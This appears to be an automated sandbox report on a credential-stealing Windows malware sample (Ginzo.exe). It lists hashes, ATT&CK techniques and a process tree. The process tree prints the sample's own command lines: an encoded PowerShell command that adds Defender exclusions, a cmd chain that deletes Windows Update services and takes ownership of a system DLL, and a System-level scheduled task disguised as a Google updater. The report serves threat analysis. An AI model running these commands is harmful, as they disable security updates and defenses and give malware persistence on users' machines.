9d5c5ef922aa7343c1ec29d5a6eb1b006f4b3aee817211ea958b6810df28510b

Analysis

max time kernel
45s
max time network
56s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
20-05-2022 23:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ginzo.exe
Size

184KB
MD5

9d754925aa0e92fcc36d052bafa0cc1d
SHA1

5f2afa65a5a43cf21b5b6fa2933ca909989679ad
SHA256

9d5c5ef922aa7343c1ec29d5a6eb1b006f4b3aee817211ea958b6810df28510b
SHA512

8775eda9a19379b6875b8eef50c7da17abda07ee1caa7fe45e83ed23a5c2b7f749e04f514b298a85e2ff73df3c4ca35263b69756f14790e65d72cf34e3067582

Score

10^/10

discovery evasion exploit spyware stealer suricata

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

722038.exeupdater.exe

pid process

4404 722038.exe
1396 updater.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

5000 takeown.exe
4272 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Ginzo.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation Ginzo.exe
Loads dropped DLL 7 IoCs

Processes:

Ginzo.exe

pid process

4864 Ginzo.exe
4864 Ginzo.exe
4864 Ginzo.exe
4864 Ginzo.exe
4864 Ginzo.exe
4864 Ginzo.exe
4864 Ginzo.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

5000 takeown.exe
4272 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 freegeoip.app
17 freegeoip.app

pid	process
4404	722038.exe
1396	updater.exe

pid	process
5000	takeown.exe
4272	icacls.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	Ginzo.exe

pid	process
4864	Ginzo.exe
4864	Ginzo.exe
4864	Ginzo.exe
4864	Ginzo.exe
4864	Ginzo.exe
4864	Ginzo.exe
4864	Ginzo.exe

pid	process
5000	takeown.exe
4272	icacls.exe

flow	ioc
16	freegeoip.app
17	freegeoip.app

Drops file in Program Files directory 2 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Program Files\Chrome\updater.exe	conhost.exe
File opened for modification	C:\Program Files\Chrome\updater.exe	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Ginzo.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Ginzo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Ginzo.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4112 schtasks.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

3336 reg.exe
3816 reg.exe
5016 reg.exe
432 reg.exe
2412 reg.exe
3308 reg.exe
1156 reg.exe
4140 reg.exe
4056 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.execonhost.exe

pid process

3280 powershell.exe
3280 powershell.exe
3148 conhost.exe

pid	process
4112	schtasks.exe

pid	process
3336	reg.exe
3816	reg.exe
5016	reg.exe
432	reg.exe
2412	reg.exe
3308	reg.exe
1156	reg.exe
4140	reg.exe
4056	reg.exe

pid	process
3280	powershell.exe
3280	powershell.exe
3148	conhost.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

Ginzo.exepowershell.execonhost.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	4864	Ginzo.exe
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeDebugPrivilege	3148	conhost.exe
Token: SeTakeOwnershipPrivilege	5000	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Ginzo.exe722038.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4864 wrote to memory of 4404	4864	Ginzo.exe	722038.exe
PID 4864 wrote to memory of 4404	4864	Ginzo.exe	722038.exe
PID 4404 wrote to memory of 3148	4404	722038.exe	conhost.exe
PID 4404 wrote to memory of 3148	4404	722038.exe	conhost.exe
PID 4404 wrote to memory of 3148	4404	722038.exe	conhost.exe
PID 3148 wrote to memory of 4956	3148	conhost.exe	cmd.exe
PID 3148 wrote to memory of 4956	3148	conhost.exe	cmd.exe
PID 4956 wrote to memory of 3280	4956	cmd.exe	powershell.exe
PID 4956 wrote to memory of 3280	4956	cmd.exe	powershell.exe
PID 3148 wrote to memory of 2432	3148	conhost.exe	cmd.exe
PID 3148 wrote to memory of 2432	3148	conhost.exe	cmd.exe
PID 2432 wrote to memory of 3124	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 3124	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 3880	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 3880	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 2296	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 2296	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 732	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 732	2432	cmd.exe	sc.exe
PID 3148 wrote to memory of 1276	3148	conhost.exe	cmd.exe
PID 3148 wrote to memory of 1276	3148	conhost.exe	cmd.exe
PID 2432 wrote to memory of 868	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 868	2432	cmd.exe	sc.exe
PID 2432 wrote to memory of 432	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 432	2432	cmd.exe	reg.exe
PID 1276 wrote to memory of 4112	1276	cmd.exe	schtasks.exe
PID 1276 wrote to memory of 4112	1276	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 3336	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3336	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2412	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2412	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3308	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3308	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 1156	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 1156	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 5000	2432	cmd.exe	takeown.exe
PID 2432 wrote to memory of 5000	2432	cmd.exe	takeown.exe
PID 2432 wrote to memory of 4272	2432	cmd.exe	icacls.exe
PID 2432 wrote to memory of 4272	2432	cmd.exe	icacls.exe
PID 2432 wrote to memory of 3816	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3816	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 4140	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 4140	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 5016	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 5016	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 4056	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 4056	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3804	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 3804	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 4356	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 4356	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 3332	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 3332	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 1476	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 1476	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 3060	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 3060	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 2368	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 2368	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 4944	2432	cmd.exe	schtasks.exe
PID 2432 wrote to memory of 4944	2432	cmd.exe	schtasks.exe
PID 3148 wrote to memory of 1620	3148	conhost.exe	cmd.exe
PID 3148 wrote to memory of 1620	3148	conhost.exe	cmd.exe
PID 1620 wrote to memory of 1372	1620	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\Ginzo.exe
"C:\Users\Admin\AppData\Local\Temp\Ginzo.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864

C:\Users\Admin\AppData\Local\722038.exe
"C:\Users\Admin\AppData\Local\722038.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\722038.exe"
3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
4⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3280

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:3124

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:3880

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:2296

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:868

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:732

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:432

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:3336

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:2412

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:3308

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1156

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4272

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3816

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4140

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:5016

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4056

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:3804

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:4356

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:3332

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1476

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:3060

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:2368

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:4944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
4⤵
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
5⤵
- Creates scheduled task(s)
PID:4112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:1372

C:\Program Files\Chrome\updater.exe
"C:\Program Files\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:1396

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Chrome\updater.exe
Filesize
4.1MB

MD5
c1fd183c8ef30db8e2be4ab51e42501f

SHA1
67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

SHA256
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

SHA512
8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

Download Submit
C:\Program Files\Chrome\updater.exe
Filesize
4.1MB

MD5
c1fd183c8ef30db8e2be4ab51e42501f

SHA1
67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

SHA256
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

SHA512
8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

Download Submit
C:\Users\Admin\AppData\Local\722038.exe
Filesize
4.1MB

MD5
c1fd183c8ef30db8e2be4ab51e42501f

SHA1
67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

SHA256
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

SHA512
8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

Download Submit
C:\Users\Admin\AppData\Local\722038.exe
Filesize
4.1MB

MD5
c1fd183c8ef30db8e2be4ab51e42501f

SHA1
67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

SHA256
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

SHA512
8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize
461KB

MD5
a999d7f3807564cc816c16f862a60bbe

SHA1
1ee724daaf70c6b0083bf589674b6f6d8427544f

SHA256
8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

SHA512
6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

Download Submit
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize
461KB

MD5
a999d7f3807564cc816c16f862a60bbe

SHA1
1ee724daaf70c6b0083bf589674b6f6d8427544f

SHA256
8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

SHA512
6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize
384KB

MD5
55c797383dbbbfe93c0fe3215b99b8ec

SHA1
1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

SHA256
5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

SHA512
648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize
384KB

MD5
55c797383dbbbfe93c0fe3215b99b8ec

SHA1
1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

SHA256
5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

SHA512
648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

Download Submit
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll
Filesize
1.3MB

MD5
8be215abf1f36aa3d23555a671e7e3be

SHA1
547d59580b7843f90aaca238012a8a0c886330e6

SHA256
83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae

SHA512
38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b

Download Submit
memory/432-164-0x0000000000000000-mapping.dmp

Download
memory/732-161-0x0000000000000000-mapping.dmp

Download
memory/868-163-0x0000000000000000-mapping.dmp

Download
memory/1156-169-0x0000000000000000-mapping.dmp

Download
memory/1276-162-0x0000000000000000-mapping.dmp

Download
memory/1372-184-0x0000000000000000-mapping.dmp

Download
memory/1476-179-0x0000000000000000-mapping.dmp

Download
memory/1620-183-0x0000000000000000-mapping.dmp

Download
memory/2296-160-0x0000000000000000-mapping.dmp

Download
memory/2368-181-0x0000000000000000-mapping.dmp

Download
memory/2412-167-0x0000000000000000-mapping.dmp

Download
memory/2432-156-0x0000000000000000-mapping.dmp

Download
memory/3060-180-0x0000000000000000-mapping.dmp

Download
memory/3124-158-0x0000000000000000-mapping.dmp

Download
memory/3148-155-0x00007FFECB870000-0x00007FFECC331000-memory.dmp

Filesize
10.8MB

Download
memory/3148-151-0x0000010DDDD20000-0x0000010DDE13B000-memory.dmp

Filesize
4.1MB

Download
memory/3280-154-0x0000023D8C920000-0x0000023D8C942000-memory.dmp

Filesize
136KB

Download
memory/3280-157-0x00007FFECB870000-0x00007FFECC331000-memory.dmp

Filesize
10.8MB

Download
memory/3280-153-0x0000000000000000-mapping.dmp

Download
memory/3308-168-0x0000000000000000-mapping.dmp

Download
memory/3332-178-0x0000000000000000-mapping.dmp

Download
memory/3336-166-0x0000000000000000-mapping.dmp

Download
memory/3804-176-0x0000000000000000-mapping.dmp

Download
memory/3816-172-0x0000000000000000-mapping.dmp

Download
memory/3880-159-0x0000000000000000-mapping.dmp

Download
memory/4056-175-0x0000000000000000-mapping.dmp

Download
memory/4112-165-0x0000000000000000-mapping.dmp

Download
memory/4140-173-0x0000000000000000-mapping.dmp

Download
memory/4272-171-0x0000000000000000-mapping.dmp

Download
memory/4356-177-0x0000000000000000-mapping.dmp

Download
memory/4404-148-0x0000000000000000-mapping.dmp

Download
memory/4864-130-0x0000000000260000-0x0000000000298000-memory.dmp

Filesize
224KB

Download
memory/4864-141-0x000000000C960000-0x000000000CB22000-memory.dmp

Filesize
1.8MB

Download
memory/4864-131-0x000000000ACA0000-0x000000000AD32000-memory.dmp

Filesize
584KB

Download
memory/4864-147-0x000000000DCB0000-0x000000000DD2A000-memory.dmp

Filesize
488KB

Download
memory/4864-144-0x000000000DC40000-0x000000000DCA6000-memory.dmp

Filesize
408KB

Download
memory/4864-132-0x000000000B2F0000-0x000000000B894000-memory.dmp

Filesize
5.6MB

Download
memory/4864-143-0x000000000DA20000-0x000000000DA5C000-memory.dmp

Filesize
240KB

Download
memory/4864-135-0x000000000B1D0000-0x000000000B280000-memory.dmp

Filesize
704KB

Download
memory/4864-140-0x000000000C3C0000-0x000000000C422000-memory.dmp

Filesize
392KB

Download
memory/4864-137-0x000000000B280000-0x000000000B2A2000-memory.dmp

Filesize
136KB

Download
memory/4864-136-0x000000000B170000-0x000000000B1C0000-memory.dmp

Filesize
320KB

Download
memory/4944-182-0x0000000000000000-mapping.dmp

Download
memory/4956-152-0x0000000000000000-mapping.dmp

Download
memory/5000-170-0x0000000000000000-mapping.dmp

Download
memory/5016-174-0x0000000000000000-mapping.dmp

Download